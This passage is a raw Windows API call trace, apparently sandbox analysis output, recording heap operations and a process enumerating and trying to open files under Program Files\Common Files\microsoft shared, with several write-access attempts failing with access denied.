out: hHeap=0x20000) returned 1 [0085.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0085.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0085.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0085.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0085.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0085.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0085.960] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6dea0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x70, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="")) returned 0 [0085.961] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0085.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0085.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0085.961] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78310 [0085.961] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.961] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e0daa01, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e0daa01, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0085.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0085.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0085.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0085.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0085.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0085.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.962] AreFileApisANSI () returned 1 [0085.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0085.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0085.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0085.963] AreFileApisANSI () returned 1 [0085.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85da0 [0085.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85da0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui") returned 73 [0085.963] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.963] GetFileType (hFile=0x424) returned 0x1 [0085.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85da0 | out: hHeap=0x20000) returned 1 [0085.963] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.963] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.963] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.963] CloseHandle (hObject=0x424) returned 1 [0085.964] AreFileApisANSI () returned 1 [0085.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x854e0 [0085.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui") returned 73 [0085.964] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.964] GetLastError () returned 0x5 [0085.964] GetLastError () returned 0x5 [0085.964] SetLastError (dwErrCode=0x5) [0085.964] GetLastError () returned 0x5 [0085.964] SetLastError (dwErrCode=0x5) [0085.964] GetLastError () returned 0x5 [0085.964] SetLastError (dwErrCode=0x5) [0085.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0085.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0085.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0085.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.964] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ᰀ")) returned 0 [0085.964] FindClose (in: hFindFile=0x78310 | out: hFindFile=0x78310) returned 1 [0085.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0085.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0085.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0085.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0085.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0085.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0085.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ae18 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0085.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0085.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0085.966] AreFileApisANSI () returned 1 [0085.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo", lpUsedDefaultChar=0x0) returned 54 [0085.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0085.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0085.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0085.966] AreFileApisANSI () returned 1 [0085.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0085.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75cd8 [0085.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo") returned 54 [0085.966] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.966] GetLastError () returned 0x5 [0085.966] GetLastError () returned 0x5 [0085.966] SetLastError (dwErrCode=0x5) [0085.966] GetLastError () returned 0x5 [0085.966] SetLastError (dwErrCode=0x5) [0085.966] GetLastError () returned 0x5 [0085.966] SetLastError (dwErrCode=0x5) [0085.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0085.966] AreFileApisANSI () returned 1 [0085.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0085.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75cd8 [0085.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo") returned 54 [0085.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.967] GetLastError () returned 0x5 [0085.967] GetLastError () returned 0x5 [0085.967] SetLastError (dwErrCode=0x5) [0085.967] GetLastError () returned 0x5 [0085.967] SetLastError (dwErrCode=0x5) [0085.967] GetLastError () returned 0x5 [0085.967] SetLastError (dwErrCode=0x5) [0085.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0085.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0085.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0085.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0085.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a2d0 [0085.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0085.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0085.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0085.967] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9f60362, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0085.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0085.968] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x782d0 [0085.968] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71143a45, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.968] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa098aa4a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0085.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0085.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0085.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0085.968] HeapFree 